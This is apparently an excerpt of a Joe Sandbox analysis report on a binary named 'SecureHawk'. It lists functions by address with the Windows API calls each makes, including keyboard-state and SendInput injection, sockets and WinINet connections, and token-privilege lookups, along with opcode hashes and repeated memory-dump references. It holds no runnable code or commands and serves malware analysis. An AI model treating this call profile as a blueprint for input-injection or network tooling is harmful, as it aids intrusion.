                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: 0026fc4de93bf7faf9fae20565400f17ff7c17a1aa7c4b07e8a63e830ef2adbf
                                  • Instruction ID: 0b9e07cba8657325f9d862eaffd256c82d2c3c142b66c2f44d3837dd43c59cf1
                                  • Opcode Fuzzy Hash: 0026fc4de93bf7faf9fae20565400f17ff7c17a1aa7c4b07e8a63e830ef2adbf
                                  • Instruction Fuzzy Hash: 3941E671A007069BDB1E8F69C8809EF77A9AF8D360B24813DE455C7640D771DDC18B40
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0034A46D
                                  • __itow.LIBCMT ref: 0034A49E
                                    • Part of subcall function 0034A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0034A759
                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0034A507
                                  • __itow.LIBCMT ref: 0034A55E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$__itow
                                  • String ID:
                                  • API String ID: 3379773720-0
                                  • Opcode ID: 654352b07c86401ce83337383ba8e742b604005fe942ef23dc32454472620462
                                  • Instruction ID: d51264d6d1cbf553b5485c0be3fe425e062ec37ea3d6ca00b061a37a2efcebc6
                                  • Opcode Fuzzy Hash: 654352b07c86401ce83337383ba8e742b604005fe942ef23dc32454472620462
                                  • Instruction Fuzzy Hash: B9418170A40208ABDF12DF54C859BFE7BF9EF45750F040069F905AB391DB74AA44CBA2
                                  APIs
                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00366E81
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366E91
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00366EF5
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366F01
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorLast$__itow__swprintfsocket
                                  • String ID:
                                  • API String ID: 2214342067-0
                                  • Opcode ID: 9fca55039b1e3752788d72bb8c623fba907e611591fcd115b07d114834d8ccb4
                                  • Instruction ID: 98bc8ac56b68b9ea2fb514feebf6dc337ea2f3201b1a0e0490f0034a5bc195d9
                                  • Opcode Fuzzy Hash: 9fca55039b1e3752788d72bb8c623fba907e611591fcd115b07d114834d8ccb4
                                  • Instruction Fuzzy Hash: 0D419175650204AFE721BF24DC87F3AB7E89B04B94F448468FA599F2D2DBB09D108F91
                                  APIs
                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00380980), ref: 00366957
                                  • _strlen.LIBCMT ref: 00366989
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _strlen
                                  • String ID:
                                  • API String ID: 4218353326-0
                                  • Opcode ID: 68571df72d36422c17ef086943f53179ec3663cd34a7e63bc245eb6c1367ad8b
                                  • Instruction ID: 8f84fe99db9f9a7445d495f63b7d06f4f2cc7c892eb8aa2032e3d46b065a7d59
                                  • Opcode Fuzzy Hash: 68571df72d36422c17ef086943f53179ec3663cd34a7e63bc245eb6c1367ad8b
                                  • Instruction Fuzzy Hash: 6141A671A00104AFCB16FBA4DCD2EBEB7A9AF48350F14C155F9169B2D2DB30AD45CB90
                                  APIs
                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00378CCB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InvalidateRect
                                  • String ID:
                                  • API String ID: 634782764-0
                                  • Opcode ID: 9a0fdf50d3b69ebe8a946f6293161ee7b15aeb41f550e28b32868cb63642de93
                                  • Instruction ID: 87fb141988edb0a5c2839cfb05adba7014e3b0ec85c72000ccdf412024df7a25
                                  • Opcode Fuzzy Hash: 9a0fdf50d3b69ebe8a946f6293161ee7b15aeb41f550e28b32868cb63642de93
                                  • Instruction Fuzzy Hash: 8C313734681108BFEF379F18CC8DBA8B769EB05310F25C112FA09E66E1CF3899509B61
                                  APIs
                                  • ClientToScreen.USER32(?,?), ref: 0037AF4D
                                  • GetWindowRect.USER32(?,?), ref: 0037AFC3
                                  • PtInRect.USER32(?,?,0037C437), ref: 0037AFD3
                                  • MessageBeep.USER32(00000000), ref: 0037B044
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: 370efa1522c42f67f2b7aaf1c6a626edb4b88b5067a83584c54009d525f88c7d
                                  • Instruction ID: 545565e84f6b75b1801ea754956d73e429dc747cb447f84c859585b5a072d27e
                                  • Opcode Fuzzy Hash: 370efa1522c42f67f2b7aaf1c6a626edb4b88b5067a83584c54009d525f88c7d
                                  • Instruction Fuzzy Hash: 2D418B71A00208DFCB22CF58C885B6EBBF9FB89310F1581A9E528DB252D739A941DB51
                                  APIs
                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00351192
                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 003511AE
                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00351214
                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00351266
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: KeyboardState$InputMessagePostSend
                                  • String ID:
                                  • API String ID: 432972143-0
                                  • Opcode ID: 755e5c00a3f29c2aa367146003d2b56c42a71d0db4f468f672d3c639c0d2c4e1
                                  • Instruction ID: fe7bbb6bfa42524d49640e265de21df9266c7f06781386a388fd96ef8fbcc279
                                  • Opcode Fuzzy Hash: 755e5c00a3f29c2aa367146003d2b56c42a71d0db4f468f672d3c639c0d2c4e1
                                  • Instruction Fuzzy Hash: 5E316B309846485EFF37CA258C05FF9BB69AB45312F08464AFD84D21F1D3748E5D9BA1
                                  APIs
                                  • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 003512D1
                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 003512ED
                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0035134C
                                  • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0035139E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: KeyboardState$InputMessagePostSend
                                  • String ID:
                                  • API String ID: 432972143-0
                                  • Opcode ID: b11c27ca339952a2bd96e8c074d7a6ea7c82892c8e3fd250f688cfce70fd6fea
                                  • Instruction ID: 107e6533bc2168050934d0d43c30f48e71a2536733903db17ea95005ede48f5d
                                  • Opcode Fuzzy Hash: b11c27ca339952a2bd96e8c074d7a6ea7c82892c8e3fd250f688cfce70fd6fea
                                  • Instruction Fuzzy Hash: FE316B34D442089EFF278A28C824FFABB69AF45312F08420AEC80465F0D3348D5C8791
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0032635B
                                  • __isleadbyte_l.LIBCMT ref: 00326389
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003263B7
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003263ED
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 9465f67319dfa410bd927db7d84cca7992a79ac4c0afa7a559eff6a23f3494a9
                                  • Instruction ID: 9603381a649da45fc6aaf91f46bb6c00b4048d9543cf48c4bab9a0a98e3b2724
                                  • Opcode Fuzzy Hash: 9465f67319dfa410bd927db7d84cca7992a79ac4c0afa7a559eff6a23f3494a9
                                  • Instruction Fuzzy Hash: 6731B235600266EFDB27DF25EC86BAA7BB9FF41320F164068F9548B1A1D731D890DB90
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00375307
                                    • Part of subcall function 003539A1: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003539BB
                                    • Part of subcall function 003539A1: GetCurrentThreadId.KERNEL32 ref: 003539C2
                                    • Part of subcall function 003539A1: AttachThreadInput.USER32(00000000,?,0035542D), ref: 003539C9
                                  • GetCaretPos.USER32(?), ref: 00375318
                                  • ClientToScreen.USER32(00000000,?), ref: 00375353
                                  • GetForegroundWindow.USER32 ref: 00375359
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                  • String ID:
                                  • API String ID: 2759813231-0
                                  • Opcode ID: f456278b274fee20fffa6765c1a4a9b0f9d7f27829ffa4fceab1865b9001540a
                                  • Instruction ID: 67ad543f40e5779cc5845415f2f48faed5d14ff9bc12adc68c251b9121ccde14
                                  • Opcode Fuzzy Hash: f456278b274fee20fffa6765c1a4a9b0f9d7f27829ffa4fceab1865b9001540a
                                  • Instruction Fuzzy Hash: F5314F72900208AFDB15EFA5C8819EFF7FDEF94304F10406AE915E7211DAB1AE048FA1
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • GetCursorPos.USER32(?), ref: 0037C8F5
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0032BC1C,?,?,?,?,?), ref: 0037C90A
                                  • GetCursorPos.USER32(?), ref: 0037C957
                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0032BC1C,?,?,?), ref: 0037C991
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                  • String ID:
                                  • API String ID: 2864067406-0
                                  • Opcode ID: 77398d7233b535b7179b30f50d0a1fd96ca3a73ba416db873c496fa18c914932
                                  • Instruction ID: 08e9c5da6a04b3e9598a5856e3f42c7179376e96a88f7c3401de6021e9e4258e
                                  • Opcode Fuzzy Hash: 77398d7233b535b7179b30f50d0a1fd96ca3a73ba416db873c496fa18c914932
                                  • Instruction Fuzzy Hash: FD31D235610118EFCB668F54C8A5EFA7BB9EB4B310F0581ADFA0987261C7399D50DFA0
                                  APIs
                                  • __setmode.LIBCMT ref: 00310B0D
                                    • Part of subcall function 0030402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00357CBE,?,?,00000000), ref: 00304041
                                    • Part of subcall function 0030402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00357CBE,?,?,00000000,?,?), ref: 00304065
                                  • _fprintf.LIBCMT ref: 00310B44
                                  • OutputDebugStringW.KERNEL32(?), ref: 0034672F
                                    • Part of subcall function 00314BFA: _flsall.LIBCMT ref: 00314C13
                                  • __setmode.LIBCMT ref: 00310B79
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                  • String ID:
                                  • API String ID: 521402451-0
                                  • Opcode ID: 327a2c71ada1b5e5fab7e419488827f4a6aa137e16f01e9fc67c03301c202d43
                                  • Instruction ID: c4f86e402bb6b81a4e09e8792b8e16e83f1776ad1290671eec8c89528cbd3095
                                  • Opcode Fuzzy Hash: 327a2c71ada1b5e5fab7e419488827f4a6aa137e16f01e9fc67c03301c202d43
                                  • Instruction Fuzzy Hash: 1D1124729042046ADA0FB7A89C43DFEBB6D9F49324F144165F204AB1C2EEA199C687A5
                                  APIs
                                    • Part of subcall function 00348B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00348B22
                                    • Part of subcall function 00348B0B: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00348B2C
                                    • Part of subcall function 00348B0B: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B3B
                                    • Part of subcall function 00348B0B: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B42
                                    • Part of subcall function 00348B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00348B58
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003490A4
                                  • _memcmp.LIBCMT ref: 003490C7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003490FD
                                  • HeapFree.KERNEL32(00000000), ref: 00349104
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                  • String ID:
                                  • API String ID: 1592001646-0
                                  • Opcode ID: 9aa6fbabd8a38441b4fa1b14b7e4dcff8575033f1dbdea43f102192cf9d48a69
                                  • Instruction ID: b762ecb29bf263b849b552ba5b6f7caa80db2a91ad0ba4efaab55f442d6f912d
                                  • Opcode Fuzzy Hash: 9aa6fbabd8a38441b4fa1b14b7e4dcff8575033f1dbdea43f102192cf9d48a69
                                  • Instruction Fuzzy Hash: 1A219D72E40209AFDB15DFA5C989BEFB7F8EF44311F05409AE845AB241E771AA05CB50
                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00361C53
                                    • Part of subcall function 00361CDD: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00361CFC
                                    • Part of subcall function 00361CDD: InternetCloseHandle.WININET(00000000), ref: 00361D99
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Internet$CloseConnectHandleOpen
                                  • String ID:
                                  • API String ID: 1463438336-0
                                  • Opcode ID: f7f99459ef4a8df61250562ea114e86af3de8fc89b1e650322f17d84faeb6a22
                                  • Instruction ID: 71b1c160254b40f920e43490e19ce03160100f877251d33e25a41af399f33aff
                                  • Opcode Fuzzy Hash: f7f99459ef4a8df61250562ea114e86af3de8fc89b1e650322f17d84faeb6a22
                                  • Instruction Fuzzy Hash: C821C235680B04BFDB179F608C00FBFB7ADFF84700F14801AFA4196A54D771A821AB90
                                  APIs
                                  • GetWindowLongW.USER32(?,000000EC), ref: 00376185
                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0037619F
                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003761AD
                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003761BB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesLayered
                                  • String ID:
                                  • API String ID: 2169480361-0
                                  • Opcode ID: 668d60c45547e7380e16ac30e9a17d7f01b4b8a55fa366878bf3d475d644a90a
                                  • Instruction ID: aab5a0f9c67cb020e1dac6ffd77c7143560e30b142181b43c33f1cbdbe9baabb
                                  • Opcode Fuzzy Hash: 668d60c45547e7380e16ac30e9a17d7f01b4b8a55fa366878bf3d475d644a90a
                                  • Instruction Fuzzy Hash: C811D635354914AFD716AB14CC5AFBA779DEF45320F048118F916CB2D2CB64AD04CB90
                                  APIs
                                    • Part of subcall function 0034F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0034E252,?,?,?,0034F045,00000000,000000EF,00000119,?,?), ref: 0034F64A
                                    • Part of subcall function 0034F63B: lstrcpyW.KERNEL32(00000000,?,?,0034E252,?,?,?,0034F045,00000000,000000EF,00000119,?,?,00000000), ref: 0034F670
                                    • Part of subcall function 0034F63B: lstrcmpiW.KERNEL32(00000000,?,0034E252,?,?,?,0034F045,00000000,000000EF,00000119,?,?), ref: 0034F6A1
                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0034F045,00000000,000000EF,00000119,?,?,00000000), ref: 0034E26B
                                  • lstrcpyW.KERNEL32(00000000,?,?,0034F045,00000000,000000EF,00000119,?,?,00000000), ref: 0034E291
                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0034F045,00000000,000000EF,00000119,?,?,00000000), ref: 0034E2C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen
                                  • String ID: cdecl
                                  • API String ID: 4031866154-3896280584
                                  • Opcode ID: 9dd54a4f8376f9f4a3023a2225b3cf3828a495c772af6ec26088dc5ee52ecc8e
                                  • Instruction ID: 0f462714e14194fd06dc4e990744e0e7a392bf3e74938bd5fa83da5898b09088
                                  • Opcode Fuzzy Hash: 9dd54a4f8376f9f4a3023a2225b3cf3828a495c772af6ec26088dc5ee52ecc8e
                                  • Instruction Fuzzy Hash: 4511933A100305AFDB2AAF74D845DBA77EDFF49350B41452AF806CF2A0EBB1A851C790
                                  APIs
                                  • _free.LIBCMT ref: 00325261
                                    • Part of subcall function 0031586C: __FF_MSGBANNER.LIBCMT ref: 00315883
                                    • Part of subcall function 0031586C: __NMSG_WRITE.LIBCMT ref: 0031588A
                                    • Part of subcall function 0031586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,?,?,?,00310F33,?,0000FFFF), ref: 003158AF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
